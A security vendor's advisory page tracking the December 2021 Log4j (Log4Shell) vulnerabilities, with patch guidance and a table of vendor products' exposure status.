Context over chaos. Disconnected technologies, siloed data, and reactive processes can only get you so far. Protecting businesses in today’s threat landscape demands more than a set of security tools – it requires context.
That's where Avertium comes in
Security. It’s in our DNA. It’s elemental, foundational. Something that an always-on, everything’s-IoT-connected world depends on.
Helping mid-to-enterprise organizations protect assets and manage risk is our only business. Our mission is to make our customers’ world a safer place so that they may thrive in an always-on, connected world.
Best-in-class technology from our partners... backed by service excellence from Avertium.
Interested in becoming a partner?
With Avertium's deal registration, partners can efficiently and confidently connect with Avertium on opportunities to protect your deals.
Microsoft Copilot for Security analyzes and synthesizes high volumes of security data which can help healthcare cybersecurity teams do more with less.
Dive into our resource hub and explore top
cybersecurity topics along with what we do
and what we can do for you.
Update 12/20/2021 - Third Log4j Vulnerability Patched Over the Weekend - Over the weekend, the Apache security team released another patch for a new vulnerability found in the Log4j logging library. The new vulnerability stems from an incomplete fix for CVE-2021-44228 and can be tracked as CVE-2021-45105, affecting versions 2.0-beta9 to 2.16.0.
CVE-2021-45105 addresses version 2.16.0, which is susceptible to a DoS attack caused by a Stack-Overflow in Context Lookups in the configuration file’s layout patterns. Version 2.16.0 was thought to be the final update for Log4j because it prevented Remote Code Execution (RCE) and Local Code Execution (LCE) exploits from taking place. However, version 2.16.0 does not address crafted input that could manipulate Context Lookup functionality that leads to a stack-overflow and crash.
It’s important to note that CVE-2021-45105 is not a cause for panic. CVE-2021-44228 is exploitable in the default configuration of the logging library, but CVE-2021-45046 and CVE-2021-45105 are not and are less likely to be exploited. According to cyber security analyst, Kevin Beaumont, CVE-2021-45105 only applies in certain “non-default” configurations and it is not being actively exploited in the wild.
As a result of this new discovery, Apache has released a patch to mitigate the vulnerability (version 2.17.0). If you haven’t already, it’s highly recommended that your organization upgrade to the latest version (2.17.0). If that’s not an option, your organization should at least upgrade to 2.16.0 and ensure they aren’t using Context lookups of the form: ${ctx:username}.
Log4j versions 1.x are not affected by this new vulnerability, as they have reached the end of life and are no longer supported. All organizations still using Log4j 1.x should upgrade to Log4j 2 to get the latest updates.
Update (12/14/2021) - Log4Shell: Previous Patch Does NOT Fix - It’s been discovered that the mitigation for CVE-2021-44228 for Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Log4j (Log4Shell) now has a new CVE identification (CVE-2021-45046) and is rated lower in severity (3.7 severity) than CVE-2021-44228 (10 severity) due to the fact that only certain non-default configurations are vulnerable, and the exploit results in Denial-of-Service (DoS) rather than Remote Code Execution (RCE). This latest development could allow attackers with control over Thread Context Map (MDC) to input data when the logging configuration uses a non-default Pattern Layout with a Context Lookup or a Thread Context Map pattern. This allows the attacker to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. This affects Log4j versions 2.0-beta9 to 2.15.0.
Examples
Previous mitigations involving configuration do not mitigate this new vulnerability. Upgrading to Log4j 2.16.0 fixes the issue and removes support for message lookup patterns, disabling JNDI by default. To mitigate the issues please implement one of the following techniques:
Additionally, some versions of Apache Log4j contain a different vulnerability. When an attacker has write access to the Log4j configuration, JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data. This means that an attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations that cause JMSAppender to perform JNDI requests, resulting in remote code execution. This makes the vulnerability very similar to CVE-2021-44228. However, CVE-2021-4104 only affects Apache Log4j 1.2, which reached the end of life in August 2015. Upgrading to Log4j 2.16.0 will address this issue and numerous others from previous versions of the software.
Update (12/13/2021) - Last Friday, December 10, 2021, we learned that a critical zero-day vulnerability was found in the Apache Log4j Java-based logging library. CVE-2021-44228, now known as Log4Shell, is an unauthenticated RCE vulnerability that allows for complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1.
Over the weekend, further news broke regarding Log4Shell, and we now know that the first attacks were observed two weeks before they were publicly disclosed. Mass exploitation began over the weekend and originated from professional crypto-mining and DDoS botnets, like Muhstik and Mirai. Additionally, Microsoft observed Log4Shell being used to deploy webshells with Cobalt Strike beacons, which are backdoors. Please see below for more information regarding the products we offer and how CVE-2021-44228 affects them.
Avertium engineering teams rolled out IOCs and detections for Log4shell Friday night. Our analyst teams have been vigilant over the weekend alerting customers if any evidence of the exploit is found in their environments. We are currently following up with all of our tech vendors to ensure that all affected applications and services are secure. Please see the table below for details and link where you can find further information from each vendor.
Log4Shell Vendor Status |
|||
Vendor |
Product |
Log4Shell Status |
Link |
Sophos |
Central |
Not Impacted |
|
Sophos |
Firewalls |
Not Vulnerable |
|
Sophos |
SUM UTM Manager |
Not Vulnerable |
|
SentinelOne |
EDR Agent |
Not Vulnerable |
|
SentinelOne |
Cloud Manager |
Not Vulnerable |
|
FortiNet |
EDR Agent |
Not Vulnerable |
|
FortiNet |
EDR Cloud |
Remediated |
|
FortiNet |
FortiEDR Portal |
Pending Fix 12-18-21 |
|
FortiNet |
FortiSIEM |
Mitigated |
|
LogRhythm |
LogRhythm Appliance |
Mitigated |
|
LogRhythm |
LogRhythm Cloud |
Mitigated |
|
BlackKite |
BlackKite |
Not Vulnerable |
|
HelpSystems |
DDI RNA |
Not Vulnerable |
Confirmed via email |
HelpSystems |
DDI Cloud Manager |
Not Vulnerable |
Confirmed via email |
Microsoft |
Sentinel |
Not Vulnerable |
|
Microsoft |
Defender for Endpoint |
Not Vulnerable |
|
AlienVault |
USM Appliance |
Not Impacted |
|
AlienVault |
USM Anywhere |
Log4j Present but not vulnerable |
|
VMware |
CarbonBlack |
Mitigated |
|
Avertium |
Breach Radar |
Mitigated |
Internal Confirmation |
Okta |
Okta Verify |
Not Vulnerable |
|
Cisco |
CiscoAMP |
Investigating |
|
Wazuh |
Wazuh |
Mitigated |
Confirmed via email |
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say - The Record by Recorded Future
New zero-day exploit for Log4j Java library is an enterprise nightmare (bleepingcomputer.com)
Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 – Microsoft Security Response Center
New Messages! (sentinelone.com)
Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2 · GitHub
Advisory: Log4j zero-day vulnerability AKA Log4Shell (CVE-2021-44228) | Sophos
CVE - CVE-2021-45046 (mitre.org)
Log4j – Apache Log4j Security Vulnerabilities
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability (thehackernews.com)
Log4j Vulnerability CVE-2021-45105: What You Need to Know | WhiteSource (whitesourcesoftware.com)
Log4j – Apache Log4j Security Vulnerabilities
The Log4j saga: New vulnerabilities and attack vectors discovered - Help Net Security
(1) New Messages! (tenable.com)
Related Reading:
Wormable Security Vulnerability Found in Several HP Printer Models
Contact us for more information about Avertium’s managed security service capabilities.